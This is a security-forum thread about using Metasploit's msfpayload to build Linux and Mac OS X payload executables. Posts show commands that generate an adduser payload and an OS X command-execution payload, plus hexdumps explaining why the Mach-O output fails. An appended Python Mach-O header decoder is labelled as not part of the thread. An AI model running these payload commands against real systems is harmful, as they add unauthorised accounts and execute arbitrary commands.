Thread: MSFPAYLOAD - Creating Executable Files For MAC OS X & Linux Targets?

  1. #1
    mcurran
    Guest

    Hello:

    I was just wondering if anyone knows how to create a Linux executable or Mac OS X executable with ./msfpayload? Are these formats supported, or would you need to build the packages after using ./msfpayload? I have searched online and wasn't able to find much information on this, but I'm guessing you would need to convert the exes to a suitable format for each target OS (Macs being harder, because you would probably need to build it on a Mac system or Mac VM). Please let me know if you have any info that may help or can point me in the right direction.

    Sorry for posting so many questions about ettercap in the HowTos. If any forum admins see them, feel free to remove/clean them up.

    Thank you,

    mcurran

  2. #2
    Junior Member Valifake's Avatar
    Join Date
    Jan 2010
    Location
    Don't worry Sir, I'm from the Internets
    Posts
    38

    You have to select the correct exploit for the target system:

    Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
    View the whole list with:

    Code:
    ./msfpayload | less
    example:
    Code:
    ./msfpayload linux/x86/adduser X > adduser && chmod +x adduser
    Syn: Metasploit Payloads - msfpayload

    The link just deals with .exe's but I guess it works with all OS's. If you find some good sites please post the links back here.
    Mathematical reasoning may be regarded rather schematically as the exercise of a combination of two facilities, which we may call intuition and ingenuity.

  3. #3
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Love the signature.....

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Quote Originally Posted by Barry View Post
    Love the signature.....
    Yes.

    I would say though that while most people know Google's URL, they don't always spend enough time there before posting here.

    If I can perform one or two Google searches and immediately find information that answers a poster's question (and almost every time I decide to try this that is exactly what happens), you better believe I am going to tell the poster about it.

    "Search first" is one of the forum rules for a reason, and as with every other forum rule, when people don't follow it they get reminded about it. The goal is to help people help themselves, and how else do you expect people to learn if you don't tell them?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    mcurran
    Guest

    Quote Originally Posted by Valifake View Post
    You have to select the correct exploit for the target system:


    View the whole list with:

    Code:
    ./msfpayload | less
    example:
    Code:
    ./msfpayload linux/x86/adduser X > adduser && chmod +x adduser
    Syn: Metasploit Payloads - msfpayload

    The link just deals with .exe's but I guess it works with all OS's. If you find some good sites please post the links back here.
    This tells me nothing. I already know how to select the correct payload, or exploit. You guessed wrong by assuming they work with all OS's; hence my question... The generated executables do not work on either system as is. One thing I have not tried is creating the files with RAW data and then figuring out how to package them for each OS... I'll update this post if I eventually find a solution for one or both systems.

    lupin: You are essentially doing exactly what his signature is asking us not to do!

  6. #6
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Quote Originally Posted by mcurran View Post
    This tells me nothing. I already know how to select the correct payload, or exploit. You guessed wrong by assuming they work with all OS's; hence my question... The generated executables do not work on either system as is. One thing I have not tried is creating the files with RAW data and then figuring out how to package them for each OS... I'll update this post if I eventually find a solution for one or both systems.
    Code:
    [laptop:~/pentest/msf3] admin% ./msfpayload osx/x86/exec O
    
           Name: OSX Execute Command
        Version: 6479
       Platform: OSX
           Arch: x86
    Needs Admin: No
     Total size: 30
           Rank: Normal
    
    Provided by:
      snagg <snagg@openssl.it>
    
    Basic options:
    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
    CMD                    yes       The command string to execute
    
    Description:
      Execute an arbitrary command
    
    
    [laptop:~/pentest/msf3] admin% ./msfpayload osx/x86/exec CMD=whoami X > random_test
    
    Created by msfpayload (http://www.metasploit.com).
    Payload: osx/x86/exec
     Length: 36
    Options: CMD=whoami
    [laptop:~/pentest/msf3] admin% file random_test
    random_test: Mach-O executable i386
    [laptop:~/pentest/msf3] admin% ./random_test
    ./random_test: Permission denied.
    [laptop:~/pentest/msf3] admin% chmod +x ./random_test 
    [laptop:~/pentest/msf3] admin% ./random_test 
    Bus error
    [laptop:~/pentest/msf3] admin% hexdump -C random_test | head
    00000000  ce fa ed fe 07 00 00 00  03 00 00 00 02 00 00 00  |????............|
    00000010  0b 00 00 00 64 03 00 00  85 00 00 00 01 00 00 00  |....d...........|
    00000020  38 00 00 00 5f 5f 50 41  47 45 5a 45 52 4f 00 00  |8...__PAGEZERO..|
    00000030  00 00 00 00 00 00 00 00  00 10 00 00 00 00 00 00  |................|
    00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    00000050  00 00 00 00 01 00 00 00  7c 00 00 00 5f 5f 54 45  |........|...__TE|
    00000060  58 54 00 00 00 00 00 00  00 00 00 00 00 10 00 00  |XT..............|
    00000070  00 10 00 00 00 00 00 00  00 10 00 00 07 00 00 00  |................|
    00000080  05 00 00 00 01 00 00 00  00 00 00 00 5f 5f 74 65  |............__te|
    00000090  78 74 00 00 00 00 00 00  00 00 00 00 5f 5f 54 45  |xt..........__TE|
    [laptop:~/pentest/msf3] admin% hexdump -C /usr/bin/nc | head
    00000000  ca fe ba be 00 00 00 02  00 00 00 07 00 00 00 03  |????............|
    00000010  00 00 10 00 00 00 6a 40  00 00 00 0c 00 00 00 12  |......j@........|
    00000020  00 00 00 0a 00 00 80 00  00 00 5b 70 00 00 00 0c  |..........[p....|
    00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    *
    00001000  ce fa ed fe 07 00 00 00  03 00 00 00 02 00 00 00  |????............|
    00001010  0d 00 00 00 9c 04 00 00  85 00 00 00 01 00 00 00  |................|
    00001020  38 00 00 00 5f 5f 50 41  47 45 5a 45 52 4f 00 00  |8...__PAGEZERO..|
    00001030  00 00 00 00 00 00 00 00  00 10 00 00 00 00 00 00  |................|
    00001040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    [laptop:~/pentest/msf3] admin%
    Seems like the file operates quite well but doesn't have quite the right header for an OS X system.

    Furthering that, and actually doing some research on the entire thing, reveals no official release notes for the OS X payloads.

    Which, if one applies a layer of logic, says that they have not been officially released yet. If you like you can start to contribute to them by providing an OS X i386 executable structure that is generic across all the platforms. I did the above tests on a 10.5 system, which looks like it's almost but not quite going to work (hint: Google what a bus error is). The same applies to the Linux system as well, the ELF header is almost but not quite there.

    It wasn't hard to figure this out by the way, and posting any information is better than complaining that it doesn't work.

    lupin: You are essentially doing exactly what his signature is asking us not to do!
    Such a pity the man is a moderator and can do whatever the hell he wants to. Besides which he is smart-than-thou (STT) and probably more awesome.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
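
Added example, not part of any post in this thread: a small Python decoder for the header bytes visible in the two hexdumps in post #6, useful when triaging an unknown Mach-O file. The function names (parse_thin, parse_fat, identify) and the 32-slice sanity cutoff are this example's own assumptions.

```python
import struct

# Constructed sample input: leading bytes copied from the two hexdumps in post #6.
RANDOM_TEST = bytes.fromhex(
    "ce fa ed fe 07 00 00 00 03 00 00 00 02 00 00 00 "
    "0b 00 00 00 64 03 00 00 85 00 00 00 01 00 00 00 ")
USR_BIN_NC = bytes.fromhex(
    "ca fe ba be 00 00 00 02 00 00 00 07 00 00 00 03 "
    "00 00 10 00 00 00 6a 40 00 00 00 0c 00 00 00 12 "
    "00 00 00 0a 00 00 80 00 00 00 5b 70 00 00 00 0c ")
CPU_NAMES = {7: "i386", 18: "ppc"}
FILETYPES = {1: "MH_OBJECT", 2: "MH_EXECUTE", 6: "MH_DYLIB", 8: "MH_BUNDLE"}

def parse_thin(data, off=0):
    """Decode the 28-byte 32-bit mach_header found at offset off."""
    if len(data) < off + 28:
        raise ValueError("truncated mach_header")
    (magic,) = struct.unpack_from(">I", data, off)
    if magic not in (0xFEEDFACE, 0xCEFAEDFE):
        raise ValueError("not a 32-bit Mach-O header")
    # ce fa ed fe on disk is 0xfeedface stored little-endian
    end = "<" if magic == 0xCEFAEDFE else ">"
    cpu, sub, ftype, ncmds, sizeofcmds, flags = struct.unpack_from(
        end + "6I", data, off + 4)
    return {"kind": "thin", "cpu": CPU_NAMES.get(cpu, cpu), "cpusubtype": sub,
            "filetype": FILETYPES.get(ftype, ftype), "ncmds": ncmds,
            "sizeofcmds": sizeofcmds, "flags": flags}

def parse_fat(data):
    """Decode a universal binary: big-endian fat_header, then the fat_arch table."""
    if len(data) < 8:
        raise ValueError("truncated fat_header")
    magic, nfat = struct.unpack_from(">II", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a fat header")
    # Java class files share this magic; an implausible slice count gives them
    # away. The cutoff of 32 is this example's own heuristic.
    if nfat > 32 or len(data) < 8 + 20 * nfat:
        raise ValueError("implausible or truncated fat_arch table")
    slices = []
    for i in range(nfat):
        cpu, sub, offset, size, align = struct.unpack_from(">5I", data, 8 + 20 * i)
        slices.append({"cpu": CPU_NAMES.get(cpu, cpu), "cpusubtype": sub,
                       "offset": offset, "size": size, "align": align})
    return {"kind": "fat", "slices": slices}

def identify(data):
    """Dispatch on the first four bytes: fat container or thin 32-bit image."""
    return parse_fat(data) if data[:4] == b"\xca\xfe\xba\xbe" else parse_thin(data)
```

The first slice offset decoded from /usr/bin/nc is 0x1000, which is where the hexdump in the post shows the second `ce fa ed fe` header.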
